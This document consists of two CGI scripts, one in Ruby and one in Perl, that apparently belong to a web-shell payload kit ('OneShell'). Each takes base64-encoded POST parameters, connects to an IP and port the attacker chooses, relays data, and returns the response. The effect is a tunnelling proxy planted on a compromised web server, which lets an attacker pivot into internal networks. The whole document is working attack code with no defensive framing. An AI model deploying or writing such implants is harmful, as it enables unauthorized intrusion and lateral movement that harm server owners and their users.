File: Payload/Ruby/CGI/OneShell/proxy.rb
require 'socket'
require 'base64'
require 'json'

def main
  return if $_POST['z0'].nil?

  action = Base64.decode64($_POST['z0'].to_s)

  if action == "forward"
    if $_POST['z2'].nil? || $_POST['z3'].nil? || $_POST['z4'].nil?
      return
    end

    target_ip = Base64.decode64($_POST['z2'].to_s)
    target_port = Base64.decode64($_POST['z3'].to_s).to_i
    
    data_bytes = Base64.decode64(Base64.decode64($_POST['z4'].to_s))

    begin
      sock = Socket.tcp(target_ip, target_port, connect_timeout: 3)
      
      if data_bytes && !data_bytes.empty?
        sock.syswrite(data_bytes)
      end

      response = ""
      retry_count = 0

      while retry_count < 3
        sleep(0.05)

        has_data = false
        begin
          while (chunk = sock.read_nonblock(8192))
            response << chunk
            has_data = true
          end
        rescue IO::WaitReadable
        rescue EOFError
          break
        end

        if has_data && !response.empty?
          break
        end
        retry_count += 1
      end

      sock.close unless sock.closed?

      encoded_res = Base64.strict_encode64(response)
      print JSON.generate({ "status" => "success", "data" => encoded_res })

    rescue => e
      print JSON.generate({ "status" => "error", "msg" => e.message })
    ensure
      sock.close if sock && !sock.closed?
    end
    return
  end
end

main

File: Payload/Perl/CGI/OneShell/proxy.pl
#!/usr/bin/perl
use strict;
use warnings;
use CGI;
use MIME::Base64;
use IO::Socket::INET;
use IO::Select;

sub main {
    my $q = CGI->new;

    my $z0 = $q->param('z0') // '';
    if (!$z0) { return; }

    my $action = decode_base64($z0);

    if ($action eq "forward") {
        my $z2 = $q->param('z2') // '';
        my $z3 = $q->param('z3') // '';
        my $z4 = $q->param('z4') // '';
        if (!$z2 || !$z3 || !$z4) { return; }

        my $target_ip = decode_base64($z2);
        my $target_port = decode_base64($z3);
        
        my $data_bytes = decode_base64(decode_base64($z4));

        my $socket = IO::Socket::INET->new(
            PeerAddr => $target_ip,
            PeerPort => $target_port,
            Proto    => 'tcp',
            Timeout  => 3
        );

        if (!$socket) {
            print "{\"status\":\"error\",\"msg\":\"Connect failed\"}";
            return;
        }

        $socket->blocking(0);

        if (defined $data_bytes && length($data_bytes) > 0) {
            syswrite($socket, $data_bytes);
        }

        my $select = IO::Select->new($socket);
        my $response = "";
        my $retry = 0;

        while ($retry < 3) {
            select(undef, undef, undef, 0.05);

            my $has_data = 0;
            
            if ($select->can_read(0.1)) {
                my $buffer;
                while (my $bytes_read = sysread($socket, $buffer, 8192)) {
                    $response .= $buffer;
                    $has_data = 1;
                }
            }

            if ($has_data && length($response) > 0) {
                last;
            }
            $retry++;
        }

        close($socket);

        my $encoded_res = encode_base64($response, "");
        print "{\"status\":\"success\",\"data\":\"$encoded_res\"}";
        return;
    }
}

main();